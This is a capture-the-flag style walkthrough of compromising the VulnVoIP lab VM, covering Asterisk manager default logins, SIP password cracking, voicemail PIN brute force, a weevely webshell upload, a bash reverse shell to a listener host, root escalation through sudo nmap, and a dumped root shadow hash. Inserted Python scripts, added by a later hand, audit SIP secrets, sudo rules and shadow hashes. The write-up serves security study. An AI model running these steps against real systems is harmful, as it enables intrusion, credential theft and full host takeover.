Hello All,

So, I decided to refresh my knowledge about pentesting VoIP and test Viproy against the old VulnVoIP image. You can download it from https://www.rebootuser.com/?p=1069

The idea was not to use the FreePBX exploit to gain access; let's start in "Hard" mode.

 

First of all we need to convert the virtual machine image from VMware to something VirtualBox can import; to do that we convert it to OVA format using ovftool, which can be downloaded from the VMware web site.

The conversion command is very simple:

ovftool vulnVoIP.vmx /path/vulnVoIP.ovf

Once the conversion finishes, just import the result into VirtualBox and that's all.

 

OK, preparation is finished and we are ready to start the VulnVoIP VM. Don't forget to configure the network interface; I prefer a Host-Only adapter.

Let's start with port scanning as usual, both TCP and UDP; the results are below:

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.3 (protocol 2.0)
53/tcp   open  domain     dnsmasq 2.45
80/tcp   open  http       Apache httpd 2.2.3 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
740/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
4445/tcp open  upnotifyp?
5038/tcp open  asterisk   Asterisk Call Manager 1.1

53/udp   open          domain    dnsmasq 2.45
68/udp   open|filtered dhcpc
111/udp  open          rpcbind   2 (RPC #100000)
631/udp  open|filtered ipp
5060/udp open          sip-proxy Asterisk PBX 1.6.2.11
|_sip-methods: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
5353/udp open          mdns      DNS-based service discovery

After a first look I decided to try port 5038/tcp with default credentials, using the Metasploit module auxiliary/voip/asterisk_login for it.

[+] 192.168.56.101:5038   - User: "admin" using pass: "amp111" - We can login on 192.168.56.101:5038!

If you don't know how to use the manager interface, read this: https://www.voip-info.org/wiki/view/Asterisk+manager+API

Let's start:

nc -nv 192.168.56.101 5038
(UNKNOWN) [192.168.56.101] 5038 (?) open
Asterisk Call Manager/1.1
Action: Login
Username: admin
Secret: amp111

Response: Success
Message: Authentication accepted

To list all available commands, use the ListCommands action. Let's enumerate all SIP users:

Action: command
Command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT
100                                                          from-internal    Yes  Always
101                        s3cur3                            from-internal    Yes  Always
102                        letmein123                        from-internal    Yes  Always
201                        secret123                         from-internal    Yes  Always
200                        quit3s3curE123                    from-internal    Yes  Always
2000                       password123                       from-internal    Yes  Always
--END COMMAND--
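The `sip show users` output above is exactly what an administrator should audit on their own PBX before anyone else does. As an added example that is not part of the original post, the following Python script parses an AMI `Response: Follows` packet and flags users whose secret is empty, appears in a small common-password list, or is too short or all digits. The packet is constructed from the values shown above, the `COMMON_SECRETS` list is a tiny stand-in for a real blocklist, and the fixed-width column layout is assumed from how the output is printed.

```python
"""Audit the 'sip show users' output returned over the Asterisk Manager
Interface (AMI). Added example, not part of the original write-up: it parses
the raw AMI 'Response: Follows' packet and flags SIP users whose secret is
empty, in a common-password list, or too short to survive a dictionary attack.
The packet below is constructed from the values shown in the post; the
fixed-width layout is an assumption based on how Asterisk 1.6 prints it."""
import re

COLUMNS = ("Username", "Secret", "Accountcode", "Def.Context", "ACL", "NAT")
WIDTHS = (27, 17, 17, 17, 5)  # assumed widths of the first five columns


def _row(*fields):
    """Render one fixed-width line the way 'sip show users' prints it."""
    return "".join(f"{f:<{w}}" for f, w in zip(fields, WIDTHS)) + fields[-1]


# Constructed sample AMI packet (CRLF-terminated, as AMI sends it).
SAMPLE_AMI_PACKET = "\r\n".join([
    "Response: Follows",
    "Privilege: Command",
    _row(*COLUMNS),
    _row("100", "", "", "from-internal", "Yes", "Always"),
    _row("101", "s3cur3", "", "from-internal", "Yes", "Always"),
    _row("102", "letmein123", "", "from-internal", "Yes", "Always"),
    _row("201", "secret123", "", "from-internal", "Yes", "Always"),
    _row("200", "quit3s3curE123", "", "from-internal", "Yes", "Always"),
    _row("2000", "password123", "", "from-internal", "Yes", "Always"),
    "--END COMMAND--",
    "",
]) + "\r\n"

# Tiny stand-in for a real breached-password blocklist (assumption).
COMMON_SECRETS = {"password", "password123", "secret", "secret123",
                  "letmein", "letmein123", "1234", "12345", "123456"}


def parse_follows_packet(packet):
    """Split an AMI 'Response: Follows' packet into (headers, output_lines).

    AMI packets are 'Key: Value' header lines; a Follows response is then
    followed by raw command output up to the '--END COMMAND--' marker.
    """
    headers, output, in_output = {}, [], False
    for line in packet.splitlines():
        if not in_output:
            m = re.match(r"^([A-Za-z][\w-]*): ?(.*)$", line)
            if m:
                headers[m.group(1)] = m.group(2)
                continue
            in_output = True  # first non-header line starts the command output
        if line == "--END COMMAND--":
            break
        output.append(line)
    return headers, output


def parse_sip_users(output_lines):
    """Turn the fixed-width table into a list of dicts, one per SIP user.

    Column boundaries are taken from the header line, so an empty Secret
    column (as for user 100) is preserved instead of shifting later fields.
    """
    lines = [l for l in output_lines if l.strip()]
    header, rows = lines[0], lines[1:]
    starts = [header.index(col) for col in COLUMNS]
    ends = starts[1:] + [None]
    return [{col: row[a:b].strip() for col, a, b in zip(COLUMNS, starts, ends)}
            for row in rows]


def audit_sip_users(users):
    """Return (username, reason) pairs for every weak SIP secret."""
    findings = []
    for user in users:
        secret = user["Secret"]
        if not secret:
            findings.append((user["Username"], "empty secret"))
        elif secret.lower() in COMMON_SECRETS:
            findings.append((user["Username"], "secret in common-password list"))
        elif len(secret) < 8 or secret.isdigit():
            findings.append((user["Username"], "short or all-digit secret"))
    return findings


if __name__ == "__main__":
    _, output = parse_follows_packet(SAMPLE_AMI_PACKET)
    for username, reason in audit_sip_users(parse_sip_users(output)):
        print(f"{username}: {reason}")
```

Run against the sample, five of the six users are reported; only 200 (`quit3s3curE123`) passes. The same functions work on a live packet captured from an authenticated AMI session, which is how you would schedule this as a recurring check.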

Wow, nice, but my goal is to test Viproy against VulnVoIP, so let's forget about these results and continue with 5060/udp.

Download and install Viproy into Metasploit, then let's try to enumerate extensions and brute-force passwords afterwards.

Some time later....

Viproy shows a lot of false positives with the different methods; I tried to understand why, but could not. I decided not to spend more time on it and to use the proven SIPVicious instead - https://github.com/EnableSecurity/sipvicious

This tool is well known and comes installed in Kali Linux; let's start with enumerating extensions:

svwar -p 5060 192.168.56.101 -m INVITE -e 100-2000

| Extension | Authentication |
------------------------------
| 201       | reqauth        |
| 200       | reqauth        |
| 2000      | reqauth        |
| 102       | reqauth        |
| 100       | weird          |
| 101       | reqauth        |

And now brute-force the passwords; I will use the SecLists dictionaries and EXTENSION from the list above:

svcrack -p 5060 -u EXTENSION -d /opt/SecLists/Passwords/10_million_password_list_top_10000.txt 192.168.56.101 -v

So, the results are:

| Extension | Password      |
-----------------------------
| 100       | [no password] |
| 2000      | password123   |

OK, we found 1 password. It's possible to extend the brute force with bigger dictionaries, but 1 cracked extension is enough to proceed.
What's next? I don't know; for FreePBX the password isn't working, and we don't know the username. The default username and password aren't working either.


http://192.168.56.101/recordings/index.php is the voicemail portal, but I couldn't log in... "Use your Voicemail Mailbox and Password" is written there. We can use the command sip show peer 2000 to identify the context for extension 2000: it's default.
Now we can retrieve information about voice messages for this extension:

OK, we see that there is one voice message and the username is support; the next step was to brute-force the FreePBX voicemail portal.

The voicemail password is usually different from the extension password (i.e. 'password123'), because voicemail is usually accessed from phones, so it can only be digits.

Use crunch to generate a wordlist:

crunch 1 4 0123456789 -o 2000.list.txt

Intercept the login request with Burp and start the brute force with Intruder. To brute-force an HTTP POST login you can use other tools as well, like patator, hydra, etc.

And we got the password: 2000 / 0000. First I tried 2000@default, the second time only 2000.
Now we can download the voice message and listen to it. Note, of course we could install a SIP softphone, connect to the PBX and use *97 to listen to the message, but we would need the voicemail password that way too.

After listening to the message we know the username and password for the FreePBX administration login. Let's log in.

What we see is that it is possible to upload a custom module to FreePBX, so let's do that; if someone doesn't know how, see https://packetstormsecurity.com/files/102125/FreePBX-2.9.0.6-Shell-Upload.html

So we need to create a directory, put our webshell inside, archive it and upload it.

I will use weevely as the web shell:

tar -cvzf weevely-0.1.tar.gz weevely/

The webshell is then available at: http://192.168.56.101/admin/modules/weevely/weevely.php

weevely http://192.168.56.101/admin/modules/weevely/weevely.php PASSWORD
[user@host]:/var/www/html/admin/modules/weevely $ id
uid=101(asterisk) gid=103(asterisk) groups=103(asterisk)

Nice, we are inside. The next step I usually take is to check sudo permissions:

[user@host]:/tmp $ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAM$

Runas and Command-specific defaults for asterisk:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAM$

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /usr/bin/nmap
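Passwordless sudo entries like these are what a host-hardening review should catch before a webshell does. As an added example, not part of the original post, the following Python parses `sudo -l` output, extracts the run-as user and the NOPASSWD tag, and flags every root entry; the sample text is constructed from the output above (with the long env_keep line shortened), and the only entry in `SHELL_ESCAPE_NOTES` is the nmap --interactive behaviour described in this post.

```python
"""Audit 'sudo -l' output for passwordless root commands. Added example, not
part of the original write-up: it parses the 'User X may run the following
commands' section, records the run-as user and the NOPASSWD tag, and flags
each root entry. The sample is constructed from the output shown in the post
(the long env_keep line is shortened)."""
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /usr/bin/nmap
"""

# One command spec as 'sudo -l' prints it: "(runas) TAG: TAG: command, command".
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

# Why a specific binary is worse than the generic case; only what the post shows.
SHELL_ESCAPE_NOTES = {
    "nmap": "nmap 4.x '--interactive' mode runs shell commands with '!'",
}


def parse_sudo_l(text):
    """Return one dict per command found in the 'may run' section."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        runas_user = m.group("runas").split(":")[0].strip()  # "(user : group)" form
        for cmd in re.split(r",\s*", m.group("cmds")):
            entries.append({"runas": runas_user,
                            "nopasswd": "NOPASSWD" in tags,
                            "command": cmd})
    return entries


def audit_sudo_entries(entries):
    """Flag every entry that runs as root; NOPASSWD makes it HIGH risk."""
    findings = []
    for e in entries:
        if e["runas"] not in ("root", "ALL"):
            continue
        binary = e["command"].split()[0].rsplit("/", 1)[-1]
        findings.append({
            "command": e["command"],
            "risk": "HIGH" if e["nopasswd"] else "MEDIUM",
            "note": SHELL_ESCAPE_NOTES.get(
                binary, "runs as root; confirm it cannot be made to execute other programs"),
        })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{f['risk']}] {f['command']}: {f['note']}")
```

Both entries on this box come back HIGH. The fix on the defending side is to drop the NOPASSWD tag and, for a service account like asterisk, to remove the rules entirely unless a documented task needs them.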

And we got the MySQL password from the FreePBX config file, so now we know the MySQL credentials as well:

cat amportal.conf
# AMPDBHOST: the host to connect to the database named 'asterisk'
AMPDBHOST=localhost
# AMPDBUSER: the user to connect to the database named 'asterisk'
AMPDBUSER=freepbx
# AMPDBENGINE: the type of database to use
AMPDBENGINE=mysql
# AMPDBPASS: the password for AMPDBUSER
AMPDBPASS=fpbx

So, connections to MySQL are not allowed from remote hosts; let's catch a reverse netcat connection and elevate privileges. To do that, upload a netcat build with the "execute a command after connecting" feature; how to do it is described in the write-up about the Vuln Docker VM.

Fire up a netcat listener and use a bash reverse shell:

bash -i >& /dev/tcp/192.168.56.1/7777 0>&1

Now we can use nmap --interactive; below you can find what was done, without comments, because it is easy to understand:

bash-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> ! id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
waiting to reap child: No child processes (10)

Execute ! /bin/bash and we are root:
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Information found:
cat .asterisk_history
_HiStOrY_V2_

cat /etc/shadow
root:$1$1Di75Uog$LPNS2VjMMW.MoETGLQ4hU/:15626:0:99999:7:::

Trying to recover the root password - no results:

john --wordlist=/usr/share/wordlists/rockyou.txt root.passwd.txt
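The root hash above starts with $1$, i.e. md5crypt, a fixed 1000-iteration MD5 construction that gives far less resistance to guessing than sha512crypt or yescrypt; that is the first thing a shadow-file review should flag, independent of whether a given wordlist happens to hit. As an added example not from the original post, the following Python classifies /etc/shadow entries by crypt scheme and flags legacy md5crypt, empty password fields and locked accounts, and converts the last-change day count to a date. The root line is the one shown above; the other two lines are constructed, and the $6$ hash is a placeholder, not a real hash.

```python
"""Classify /etc/shadow password hashes by algorithm. Added example, not part
of the original write-up: it parses shadow lines, identifies the crypt scheme
from the '$id$' prefix and flags legacy md5crypt ('$1$') as weak, locked
accounts as such, and empty password fields as critical. The root line is the
one shown in the post; the other two lines are constructed, and the '$6$'
value is a placeholder rather than a real hash."""
from datetime import date, timedelta

SAMPLE_SHADOW = """\
root:$1$1Di75Uog$LPNS2VjMMW.MoETGLQ4hU/:15626:0:99999:7:::
asterisk:!!:15626:0:99999:7:::
backup:$6$PLACEHOLDERSALT$PLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDERHASH:17000:0:99999:7:::
"""

# crypt(3) scheme identifiers and whether they are still acceptable today.
SCHEMES = {
    "1": ("md5crypt", False),
    "2a": ("bcrypt", True), "2b": ("bcrypt", True), "2y": ("bcrypt", True),
    "5": ("sha256crypt", True),
    "6": ("sha512crypt", True),
    "7": ("scrypt", True),
    "y": ("yescrypt", True),
}

EPOCH = date(1970, 1, 1)  # shadow stores dates as days since the Unix epoch


def parse_shadow_line(line):
    """Return the user, the raw hash field and the last-change date."""
    fields = line.split(":")
    if len(fields) < 9:
        raise ValueError(f"malformed shadow entry: {line!r}")
    user, pw_hash, last_change = fields[0], fields[1], fields[2]
    changed = EPOCH + timedelta(days=int(last_change)) if last_change else None
    return {"user": user, "hash": pw_hash, "last_change": changed}


def classify_hash(pw_hash):
    """Map a shadow password field to (scheme, status)."""
    if pw_hash == "":
        return ("none", "CRITICAL: empty password field, login without password")
    if pw_hash.startswith(("!", "*")):
        return ("locked", "ok: account locked or no password set")
    if pw_hash.startswith("$"):
        scheme_id = pw_hash.split("$")[1]
        name, acceptable = SCHEMES.get(scheme_id, (f"unknown(${scheme_id}$)", False))
        status = "ok" if acceptable else "WEAK: legacy scheme, migrate to sha512crypt or yescrypt"
        return (name, status)
    return ("descrypt", "WEAK: traditional DES crypt, 8-character limit")


def audit_shadow(text):
    """Classify every entry in a shadow file dump."""
    report = []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_shadow_line(line)
        scheme, status = classify_hash(entry["hash"])
        report.append({**entry, "scheme": scheme, "status": status})
    return report


if __name__ == "__main__":
    for r in audit_shadow(SAMPLE_SHADOW):
        print(f"{r['user']:<10} {r['scheme']:<12} changed {r['last_change']} {r['status']}")
```

On this image the root entry is reported as md5crypt last changed in October 2012, which is the combination (weak scheme, stale password) that justifies rotating it under a modern scheme.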


Of course, we don't need the root password, because we can create SSH keys for the root user.

cat /root/trophy.txt
cc614640424f5bd60ce5d5264899c3be
It's an MD5 hash; cc614640424f5bd60ce5d5264899c3be is the MD5 of Reb00tu53r.

So, the server is pwned, root rights gained, that's all.

 

P.S.: This vulnerable VoIP VM is old, I know; if you know a newer one, let me know in the comments.

 

Cheers

 

 
